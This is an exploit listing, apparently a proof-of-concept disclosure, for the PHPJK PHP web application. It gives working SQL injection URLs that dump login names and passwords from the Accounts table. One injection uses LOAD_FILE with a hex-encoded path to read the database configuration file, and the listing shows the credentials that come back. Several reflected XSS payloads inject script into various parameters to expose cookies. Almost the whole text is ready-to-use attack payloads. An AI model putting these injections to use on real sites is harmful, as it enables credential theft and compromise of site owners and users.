http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

Read database credentials:
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696
775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/*

//Result (in the page source code) :
$sUseDB = "MYSQL";
$sDatabaseName = "phpjk";
$sDatabaseServer = "localhost";
$sDatabaseLogin = "my_user";
$sDatabasePassword = "my_password";

ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php )


Xss get :

http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iDBLoc=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?sSort=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=</textarea>'"><script>alert(document.cookie)</script>